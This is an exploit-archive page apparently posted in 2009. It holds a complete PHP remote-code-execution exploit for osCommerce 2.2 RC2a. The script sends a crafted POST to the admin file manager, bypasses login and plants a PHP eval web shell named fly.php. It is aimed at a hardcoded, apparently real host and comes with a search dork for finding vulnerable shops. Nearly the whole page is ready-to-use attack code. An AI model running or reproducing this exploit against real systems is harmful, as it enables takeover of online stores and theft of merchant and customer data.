Home / os / win10

oscommerceom-exec.txt

Posted on 02 September 2009

<?php print_r(' +---------------------------------------------------------------------------+ osCommerce Online Merchant 2.2 RC2a RCE Exploit by Flyh4t mail: phpsec@hotmail.com team: http://www.wolvez.org dork: Powered by osCommerce Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST Thx to exploits of blackh +---------------------------------------------------------------------------+ '); $host ='democn.51osc.com'; $path = '/'; $admin_path = 'admin/'; $shellcode = "filename=fly.php&file_contents=test<?php%20@eval($_POST[aifly]);?>"; $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1 "; $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* "; $message.="Accept-Language: zh-cn "; $message.="Content-Type: application/x-www-form-urlencoded "; $message.="Accept-Encoding: gzip, deflate "; $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) "; $message.="Host: $host "; $message.="Content-Length: ".strlen($shellcode)." "; $message.="Connection: Close "; $message.=$shellcode; $fd = fsockopen($host,'80'); if(!$fd) { echo '[~]No response from'.$host; die; } fputs($fd,$message); echo ("[+]Go to see U webshell : $host/fly.php"); ?>

 

TOP